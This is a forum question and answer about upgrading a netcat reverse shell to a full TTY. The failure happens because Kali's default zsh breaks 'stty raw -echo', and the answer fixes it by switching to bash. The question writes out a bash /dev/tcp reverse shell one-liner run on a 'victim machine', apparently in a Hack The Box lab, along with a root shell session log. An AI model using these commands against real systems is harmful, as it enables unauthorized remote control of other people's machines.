Upgrading a reverse shell with stty raw -echo doesn't work



  • I successfully got a reverse shell:

    nc -lnvp 8000 # in Kali
    /bin/bash -i >& /dev/tcp/192.168.6.1/8000 0>&1 # in the victim machine
    

    I tried to upgrade it in the standard way:

    python -c 'import pty; pty.spawn("/bin/bash")'
    CTRL + Z
    stty raw -echo
    fg
    export TERM=xterm
    

    However, after running stty raw -echo and bringing the reverse shell back to the foreground with fg, the reverse shell doesn't working properly. When I press the ENTER button to attempt to run a command, then it prints ^M. Since the ENTER button doesn't work, I can't run any commands and I can't use the shell.

    I know the commands are correct, because it used to work, but after upgrading to the latest Kali Linux, it doesn't work anymore.

    Full output of terminal session when trying to upgrade the shell:

    ┌──(user㉿kali)-[~/exercises/htb]
    └─$ nc -lnvp 8000
    listening on [any] 8000 ...
    connect to [10.0.2.15] from (UNKNOWN) [172.17.0.2] 46138
    root@9070f0e8043f:/# id 
    id
    uid=0(root) gid=0(root) groups=0(root)
    root@9070f0e8043f:/# python -c 'import pty; pty.spawn("/bin/bash")'
    python -c 'import pty; pty.spawn("/bin/bash")'
    root@9070f0e8043f:/# ^Z
    zsh: suspended  nc -lnvp 8000
    ┌──(user㉿kali)-[~/exercises/htb]
    └─$ stty raw -echo                                                         148 ⨯ 1 ⚙
    ┌──(user㉿kali)-[~/exercises/htb]
                                         └─$                                             fg                          
    [1]  + continued  nc -lnvp 8000
                                   export TERM=xterm^M^M
    


  • The reason why it doesn't work in Kali Linux is because the latest Kali uses the zsh shell by default, not bash. To get it to work, you just have to make sure you're using the bash shell.

    To temporarily switch to a bash shell, run the following command in your terminal:

    exec bash --login
    

    You can confirm if you're using bash by running:

    ps -p $$
    

    In the terminal which uses bash, run the listener and run the commands to upgrade the shell:

    python -c 'import pty; pty.spawn("/bin/bash")'
    CTRL + Z
    stty raw -echo
    fg
    export TERM=xterm
    

    As long as you're using bash and not zsh, it will work.



Suggested Topics

  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2